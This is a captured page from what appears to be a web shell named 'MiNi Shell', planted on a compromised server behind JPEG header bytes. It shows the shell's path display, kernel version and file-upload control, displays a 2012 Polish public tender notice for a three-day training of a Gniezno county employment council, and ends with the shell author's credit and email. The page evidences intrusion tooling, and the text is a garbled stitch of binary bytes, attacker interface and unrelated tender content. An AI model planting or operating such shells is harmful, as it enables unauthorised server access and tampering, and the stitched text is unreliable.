JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/435976-N-2012.html

<p class="kh_header"><b>Gniezno: Przedmiotem zamówienia jest organizacja i przeprowadzenie trzydniowego szkolenia dla  
Powiatowej Rady Zatrudnienia i pracowników Powiatowego Urzędu Pracy w Gnieźnie 
z zakresu aktualizacji przepisów oraz obowiązków związanych z pełnieniem funkcji członka Powiatowej Rady Zatrudnienia</b><br>
<b>Numer ogłoszenia: 435976 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sobieskiego 20, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4261649, faks 061 4261162.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie trzydniowego szkolenia dla  
Powiatowej Rady Zatrudnienia i pracowników Powiatowego Urzędu Pracy w Gnieźnie 
z zakresu aktualizacji przepisów oraz obowiązków związanych z pełnieniem funkcji członka Powiatowej Rady Zatrudnienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie trzydniowego szkolenia dla  
Powiatowej Rady Zatrudnienia i pracowników Powiatowego Urzędu Pracy w Gnieźnie 
z zakresu aktualizacji przepisów oraz obowiązków związanych z pełnieniem funkcji członka Powiatowej Rady Zatrudnienia.  W szkoleniu uczestniczyć będzie  maksymalnie 16 osób. Zamawiający wymaga, aby szkolenie odbyło się w miejscowości Szklarska Poręba lub Karpacz (w załączniku nr 1 Wykonawca zobowiązany jest określić dokładny adres oraz nazwę obiektu w którym odbywać się będzie szkolenie). 

Cel szkolenia

Celem szkolenia jest uaktualnienie oraz poszerzenie wiedzy dla członków Powiatowej Rady Zatrudnienia. 
Wykonawca zobowiązany będzie do opracowania programu szkolenia i wpisania tematów zajęć oraz treści zajęć w załączniku nr 1 do SIWZ pkt 2 - plan nauczania, natomiast wybrany 
w  niniejszym postępowaniu Wykonawca zobowiązany będzie dostarczyć w terminie wyznaczonym przez Zamawiającego harmonogram szkolenia. 

2. Warunki organizacyjne i miejsce szkolenia 
2.1 Wykonawca zobowiązany będzie zapewnić transport (niepublicznym środkiem transportu) wszystkim uczestnikom szkolenia pierwszego dnia (10.12.2012 r.) szkolenia 
z Gniezna (z Powiatowego Urzędu Pracy w Gnieźnie) do miejsca szkolenia oraz ostatniego dnia (12.12.2012 r.) z miejsca szkolenia do Gniezna (do Powiatowego Urzędu Pracy 
w Gnieźnie). Środek  transportu musi spełniać wszelkie warunki bezpieczeństwa, stan techniczny pojazdu musi być zgodny z przepisami o ruchu drogowym, posiadać sprawną klimatyzację, ogrzewanie, z miejscami siedzącymi na minimum 16 osób + posiadać oddzielne miejsce na ulokowanie bagaży uczestników szkolenia. Przewoźnik musi posiadać odpowiednie licencje na przewóz osób. 
2.2 Wykonawca zobowiązany będzie do zapewnienia zakwaterowania i organizacji szkolenia 
w obiekcie o standardzie minimum czterogwiazdkowym określonym przez Rozporządzenie Ministra Gospodarki Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich 
i innych obiektów, w których świadczone są usługi hotelarskie (Dz. U. z 2006 r. nr 22,
poz. 169).

2.3 Pokoje w których będą zakwaterowani uczestnicy szkolenia muszą być dwuosobowe wyposażone w dwa łóżka jednoosobowe, zadbane, standardem odpowiadające obiektowi, 
z oknem z możliwością jego otwarcia, wyposażone w węzeł sanitarny (toaleta, umywalka, kabina prysznicowa), klimatyzację, sprawny telewizor, lodówkę, telefon, ogrzewanie oraz dostęp do Internetu. Wykonawca ma obowiązek skoordynowania zakwaterowania uczestników szkolenia w obiekcie. 
2.4. Wykonawca zobowiązany będzie zapewnić usługę oraz obsługę gastronomiczną podczas trwania szkolenia dla każdego uczestnika szkolenia. 
Wykonawca zapewni usługi gastronomiczne rozumiane jako:
- 2 śniadania w formie bufetu (bufet na zimno oraz dania na ciepło) dodatki (pieczywo min. 3 rodzaje, masło), owoce,  wraz z kawą, herbatą, mleko, cytryny, cukier,  soki owocowe,  woda mineralna gazowana oraz niegazowana, 
- 3 obiady - zawierające: zupę, ciepłe danie główne, surówki, warzywa gotowane oraz 
kawę, herbatę, mleko, cytryny, cukier,  soki owocowe,  wodę mineralną gazowaną 
i niegazowaną, deser
- 2 kolacje: zawierające przystawki zimne mięsne i bezmięsne min. 3 rodzaje, dodatki (pieczywo min. 3 rodzaje, masło, sosy itp.), ciepłe danie główne mięsne i bezmięsne (do wyboru), sałatki, kawę, herbatę, mleko, cytryny, cukier, soki owocowe (min. 3 rodzaje),  wodę mineralną gazowaną i niegazowaną, deser (2 rodzaje do wyboru). 
- 6 przerw kawowych podczas merytorycznej części szkolenia, składające się z: kawy, herbaty, mleka, cytryn, cukru, ciastek kruchych (min. 3 rodzaje),  soków owocowych (min. 3 rodzaje),  wody mineralnej gazowanej i niegazowanej. Wykonawca zobowiązany będzie do uzupełniania podczas trwania zajęć ww. produktów. 
Zamawiający wymaga, aby miejsce wydawania i spożywania posiłków znajdowało się w tym samym obiekcie, w którym będzie odbywało się szkolenie, w sali restauracyjnej. Wykonawca zobowiązany będzie zorganizować obsługę kelnerską. Wybrany w niniejszym postępowaniu Wykonawca zobowiązany będzie na min. 2 dni przed organizowanym szkoleniem przedstawić menu obiadów i kolacji zgodnie z powyższym opisem.  
Ponadto Wykonawca zobowiązuje się zapewnić i wyposażyć każdego uczestnika szkolenia 
w suchy prowiant tj: minimum 2 kanapki składające się ze świeżego pieczywa 
z masłem, szynką, serem, sałatą, owoce np. jabłka, wody mineralnej w butelkach o pojemności 0,5 l - gazowanej i niegazowanej oraz soku z owoców w butelkach o pojemności min. 0,33 l podczas przejazdu do miejsca szkolenia w pierwszym dniu szkolenia oraz powrotu ze szkolenia w trzecim dniu szkolenia. 
Zamawiający zastrzega sobie prawo, aby kolacje odbywały się w pomieszczeniu zarezerwowanym wyłącznie dla uczestników szkolenia lub w pomieszczeniu z wyraźnie wyodrębnionym obszarem dla uczestników szkolenia w celu możliwości omówienia przez uczestników szkolenia zagadnień  poruszanych podczas zajęć. Ponadto Wykonawca w drugim dniu szkolenia zobowiązany będzie do zorganizowania uroczystej kolacji z obsługą kelnerską. 
2.5 Wykonawca zapewni salę wykładową do przeprowadzenia szkolenia w miejscu zakwaterowania, która musi spełniać następujące warunki:
- być przestronna i klimatyzowana, przystosowana do liczby osób przewidzianych do przeszkolenia;
- posiadać oświetlenie naturalne i sztuczne, 
- posiadać miejsca siedzące dla każdego uczestnika szkolenia w układzie kinowym lub szkolnym, z miejscem umożliwiającym wykonywanie notatek przez uczestnika szkolenia;
- gwarantować naukę w warunkach wymaganych w przepisach bezpieczeństwa i higieny pracy;
- być wyposażona w pomoce dydaktyczne dostosowane do prowadzenia szkolenia będącego przedmiotem zamówienia (m.in. urządzenia audiowizualne - laptop, nagłośnienie 
w przypadku dużej sali, rzutnik multimedialny, ekran do wyświetlania prezentacji; itd.);
- posiadać zaplecze socjalne i sanitarne,  toaleta na tym samym poziomie co sala wykładowa, 

Wykonawca zobowiązany jest do dokładnego przedstawienia miejsca zakwaterowania (opisu hotelu)  oraz opisu warunków, w jakich będzie przeprowadzone szkolenie. 

Zamawiający dopuszcza zmianę miejsca szkolenia tylko w przypadkach wynikających ze zdarzeń losowych, których na dzień składania ofert nie można było przewidzieć. Zmiana wymaga powiadomienia i akceptacji przez Zamawiającego, nowe miejsce szkolenia musi być zgodne z wymaganiami SIWZ oraz standardowo nie gorsze od miejsca szkolenia zaproponowanego w ofercie. Wykonawcy nie będzie przysługiwało dodatkowe wynagrodzenie z tytułu zmiany miejsca szkolenia.

3. Materiały szkoleniowe 
Podczas realizacji szkolenia Wykonawca zobowiązany będzie zapewnić każdemu  uczestnikowi szkolenia materiały biurowe i dydaktyczne tzn.:
- materiały biurowe: segregator z  materiałami dydaktycznymi, długopis, zakreślacz;
- materiały dydaktyczne w postaci: 
  * skryptu (w wersji papierowej) obejmującego treścią omawiane zagadnienia,
  * wydruku prezentacji multimedialnych z częścią do notatek,
  * pendrive min. 4 GB na których zapisana zostanie kopia omawianych zagadnień
Materiały szkoleniowe będą przekazywane nieodpłatnie każdemu uczestnikowi szkolenia muszą być adekwatne do treści szkolenia, dobre jakościowo, zawierające aktualne dane oraz obowiązujące na dzień realizacji szkolenia przepisy prawne. Materiały wykorzystywane podczas realizacji szkolenia powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć. 
4. Liczba uczestników szkolenia
 Liczba uczestników szkolenia: min. 13 max 16 osób
Wykonawca wyłoniony w trakcie przetargu po podpisaniu umowy, a przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych na szkolenie.
Wykonawca zobowiązany będzie do wpisania  w formularzu ofertowym załącznik nr 1 do SIWZ, kosztów organizacji szkolenia - cenę jednostkową brutto za jednego uczestnika szkolenia, która będzie nie zmienna w zależności od tego ile osób będzie uczestniczyć 
w szkoleniu (nie dopuszcza się wariantowości cen).
W przypadku nie podjęcia przez wskazaną osobę szkolenia Zamawiający może skierować na zwolnione miejsce inną osobę, która zobowiązana jest realizować obowiązki uczestnika szkolenia. Zamawiający jednak zastrzega sobie prawo do nie skierowania na zwolnione miejsce nowego uczestnika szkolenia wówczas Wykonawca zobowiązany będzie do wystawienia faktury na kwotę, która obejmować będzie  koszt szkolenia tylko za faktycznie przebywających uczestników szkolenia. Zamawiający określił minimalną i maksymalną liczbę uczestników szkolenia na podstawie której Wykonawca może określić wartość zamówienia.  
5. Czas trwania szkolenia (bloków wykładowych)
Wymagana ilość godzin zajęć wykładowych przypadających na jednego uczestnika szkolenia to 18 godzin zegarowych.  Godzina zegarowa  liczy 60 minut i obejmuje zajęcia edukacyjne liczące 50 minut oraz przerwę, liczącą średnio 10 minut, gdyż długość przerw może być ustalana w sposób elastyczny.

6. Wymagania dotyczące zaświadczeń 
Szkolenie zakończy się wydaniem uczestnikom zaświadczeń potwierdzających udział 
w odbytym szkoleniu. Wykonawca zobowiązany będzie w wyznaczonym czasie przez Zamawiającego do dostarczenia w celu akceptacji przez Zamawiającego wzoru zaświadczeń jakie otrzyma każdy uczestnik szkolenia.
7. Ubezpieczenie
Wykonawca zobowiązany jest do ubezpieczenia NW każdego uczestnika szkolenia na czas trwania szkolenia.
TERMIN WYKONANIA ZAMÓWIENIA
Zamawiający wymaga, aby szkolenie zostało przeprowadzone w dniach od 10.12.2012 do 12.12.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku posiadania posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest wykazać, że w okresie ostatnich trzech lat przed  upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali lub wykonują (dotyczy świadczeń okresowych lub ciągłych), co najmniej dwa szkolenia zamknięte tzn. na zlecenie zewnętrznych w stosunku do siebie podmiotów, ponadto ilość osób uczestniczących w każdym szkoleniu wynosiła min. 13 osób oraz zakres usługi obejmował zapewnienie bazy wykładowej i noclegowej 
w obiekcie zamkniętym np. obiekt hotelarski.  Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie zamówienia.
W sytuacji, gdy Wykonawca wykaże się realizacją szkoleń składających się z kilku edycji  - każda edycja traktowana będzie jako odrębne szkolenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca musi zapewnić opiekuna do kontaktu z uczestnikami szkolenia oraz Zamawiającym, który będzie przebywał w miejscu organizacji szkolenia. 
- Wykonawca musi zapewnić wykładowcę lub wykładowców do realizacji bloków wykładowych. Wykładowca musi być doktorem nauk prawnych lub radcą prawnym, adwokatem itp. oraz posiadać doświadczenie w przeprowadzeniu co najmniej 2 szkoleń w  ciągu ostatnich trzech lat przed upływem terminu składania ofert dla Powiatowej Rady Zatrudnienia (należy w wykazie podać informację dla jakiej PRZ było organizowane szkolenie np. Powiatowa Rada Zatrudnienia w Gnieźnie) 
a szkolenia, które wykładowca przeprowadzał  związane były z tematyką rynku pracy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Dołączony do oferty Certyfikat jakości usług posiadany przez instytucję szkoleniową/akredytacja kuratora oświaty (szczegóły w SIWZ) - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany kadry dydaktycznej/opiekuna szkolenia tylko w przypadkach wynikających ze zdarzeń losowych, zmiana wymaga powiadomienia i akceptacji Zamawiającego ponadto zgłoszony wykładowca powinien legitymować się nie niższym doświadczeniem, wykształceniem niż określony w warunkach udziału w postępowaniu. 2. Zamawiający dopuszcza zmianę miejsca szkolenia tylko w przypadkach wynikających ze zdarzeń losowych, których na dzień składania ofert nie można było przewidzieć. Zmiana wymaga powiadomienia i akceptacji przez Zamawiającego, nowe miejsce szkolenia musi być zgodne z wymaganiami SIWZ oraz standardowo nie gorsze od miejsca szkolenia zaproponowanego w ofercie. Wykonawcy nie będzie przysługiwało dodatkowe wynagrodzenie z tytułu zmiany miejsca szkolenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupgniezno.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gnieźnie ul. Sobieskiego 20 62-200 Gniezno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Gnieźnie ul. Sobieskiego 20 62-200 Gniezno. Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com